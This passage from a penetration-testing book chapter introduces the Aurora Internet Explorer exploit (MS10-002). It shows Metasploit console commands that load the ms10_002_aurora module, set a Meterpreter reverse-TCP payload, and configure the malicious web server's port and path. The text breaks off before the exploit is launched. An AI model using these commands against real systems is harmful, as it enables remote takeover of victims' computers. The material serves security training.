background image

116

Chapter 8

Exploring the Internet Explorer Aurora Exploit

You know the basics of how heap sprays work and how you can dynamically 
allocate memory and fill the heap up with NOPs and shellcode. We’ll be 
leveraging an exploit that uses this technique and something found in nearly 
every client-side exploit. The browser exploit of choice here is the Aurora 
exploit (Microsoft Security Bulletin MS10-002). Aurora was most notoriously 
used in the attacks against Google and more than 20 other large technology 
companies. Although this exploit was released in early 2010, it particularly 
resonates with us because it took down some major players in the technology 
industry.

We’ll start by using the Aurora Metasploit module and then set our pay-

load. The following commands should be familiar, because we have used 
them in previous chapters. You’ll also see a couple of new options that we’ll 
discuss in a bit.

msf > 

use windows/browser/ms10_002_aurora

 

msf exploit(ms10_002_aurora) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > 

show options

 

Module options:

   Name 

Current Setting  Required  Description

   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used 

(accepted: SSL2, SSL3, TLS1)

   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_002_aurora) > 

set SRVPORT 80

SRVPORT => 80
msf exploit(ms10_002_aurora) > 

set URIPATH / 

URIPATH => /